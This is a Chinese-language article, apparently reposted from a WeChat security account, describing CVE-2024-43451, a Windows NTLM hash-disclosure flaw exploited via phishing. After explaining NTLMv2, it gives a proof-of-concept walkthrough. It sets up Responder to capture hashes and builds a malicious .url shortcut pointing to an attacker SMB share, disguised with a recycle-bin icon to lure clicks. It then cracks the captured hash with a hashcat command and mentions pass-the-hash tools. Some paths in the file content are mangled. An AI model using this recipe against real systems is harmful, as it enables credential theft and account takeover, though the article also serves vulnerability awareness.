描述
-
名称:CVE-2024-43451
-
CVSSv3 评分:6.5
-
受影响的版本:2024 年 11 月补丁之前的所有 Microsoft Windows 版本
CVE-2024-43451 是 Microsoft Windows 中的一个零日漏洞,攻击者可以利用该漏洞在与用户进行最少交互的情况下捕获 NTLMv2 密码哈希,从而可能导致凭据被盗。一种常用的利用方法是利用 SMB 连接上的 NTLM 身份验证来捕获远程服务器的哈希。此漏洞已在 2024 年 11 月的更新中得到修补。建议用户应用相关的安全更新以降低风险。
此次攻击被发现利用了一封从受感染的乌克兰政府服务器发送的网络钓鱼电子邮件。该电子邮件包含一个恶意 URL 文件。当用户通过右键单击、删除或移动文件与文件交互时,漏洞就会被激活。这会触发与攻击者服务器的连接,从而下载更多恶意文件,例如 SparkRAT 恶意软件(一种开源远程访问木马,允许攻击者控制受害者的系统)。
NTLM 身份验证
NTLMv2 是目前最安全且最具相关性的版本。
-
客户端连接到服务器并请求访问资源。
-
服务器生成一个随机数(一个随机的 16 字节质询)并将其发送给客户端。
-
客户端发送使用 HMAC-MD5 算法生成的响应,其中包括密码哈希(使用 NT 哈希算法)、服务器随机数、时间戳、客户端随机数等。
-
服务器使用 NT 哈希并重复相同的计算来生成自己的 NTLM 响应,一旦它们各自有了自己的响应,它们就可以对它们进行比较。
-
一旦比较,服务器就会决定是否接受或拒绝连接。
开发
POC 设置
为了为此 POC 创建工作环境,我们必须设置一个目标 Windows 机器,其版本号
在 2024 年 11 月之前发布,以及一个远程服务器来模拟捕获哈希:
1.下载并安装Responder以通过 SMB 捕获哈希:
brew install python3git clone https://github.com/lgandx/Responder.gitcd Respondersudo python3 Responder.py -I <put your network interface> -v
2.确保目标 Windows VM 与远程“黑客”环境之间成功连接。
3.通过进入资源管理器并输入以下内容来测试响应程序设置\(remote server IP):
创建漏洞
由于所有漏洞利用都需要与远程服务器建立 SMB 连接,因此我们可以使用一个简单的文件来模拟它:
1.打开记事本
2.输入以下内容:
您可以输入任何可以诱使用户进行交互的图标,我使用了“已满垃圾桶”图标(32)
[InternetShortcut]
URL=\(remote server IP)share
IconIndex=32
IconFile=C:WindowsSystem32shell32.dll3.将其保存为(名称).url
活动进程
一旦文件准备好并传送到目标系统,窃取哈希只需要很少的用户交互。此交互可能涉及以下任何操作:
-
下载文件并访问“下载”文件夹
-
右键单击文件
-
将文件移动到另一个文件夹
Cracking
Mimikatz有了未加密的哈希值,我们可以尝试破解它以显示纯文本密码,或者使用或之类的工具在“传递哈希”攻击中使用它Metasploit。
在我们的例子中,一个简单的Hashcat命令就可以显示我的密码:hashcat -m 5600 leak.txt rockyou.txt
-
https://github.com/RonF98/CVE-2024-43451-POC
原文始发于微信公众号(Ots安全):CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论